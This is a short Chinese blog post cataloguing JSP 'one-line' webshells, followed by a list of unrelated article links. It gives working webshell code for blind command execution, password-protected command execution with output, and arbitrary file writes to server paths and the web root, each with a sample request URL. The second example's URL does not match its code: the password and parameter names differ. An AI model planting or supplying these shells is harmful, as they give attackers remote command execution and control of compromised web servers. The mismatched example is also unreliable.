jsp一句话木马总结
2024-10-20 03:47:09
一、无回显的命令执行(命令执行后不会在前端页面返回数据)
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
请求url:http://127.0.0.1/shell.jsp?i=whoami
二、有回显带密码的命令执行(命令执行后会在前端返回数据)
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
请求url:http://127.0.0.1/shell.jsp?pwd=admin&cmd=calc
三、文件写入(改写目标服务器里的文件,若文件不存在则创建)
1、ISO-8859-1输入:
new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
请求url:http://127.0.0.1/input.jsp?file=root/test.txt&content=test
2、UTF-8输入:
new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
请求url:http://127.0.0.1/input.jsp?file=root/test.txt&content=test
3、Web目录写入;
new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
请求url:http://127.0.0.1/input.jsp?file=test.txt&content=test
最新文章
- 基于Linux的WebSphere性能调优与故障诊断
- 零件分组_DP
- bzoj2424 [HAOI2010]订货
- hdu 2844 多重背包coins
- 《c程序设计语言》读书笔记--每行一个单词打印输入的字符,除去空符
- Yii2 CSRF
- 【转】解决Cannot change version of project facet Dynamic web module to 2.5
- Lucene自定义扩展QueryParser
- Java中一些常用的代码
- 基于ARM的车牌识别技术研究与实现
- 《Redis入门指南》第2版 读书笔记
- LOJ #2058「TJOI / HEOI2016」求和
- 总结sql中in和as的用法
- windows下局域网文件共享,不需要登录账号密码
- 20150401 作业2 结对 四则运算ver 1.0
- Hive数据类型及文本文件数据编码
- C# 字符串的操作
- 使用ajax异步上传文件或图片(配合php)
- html_parser
- hdu4059The Boss on Mars 容斥原理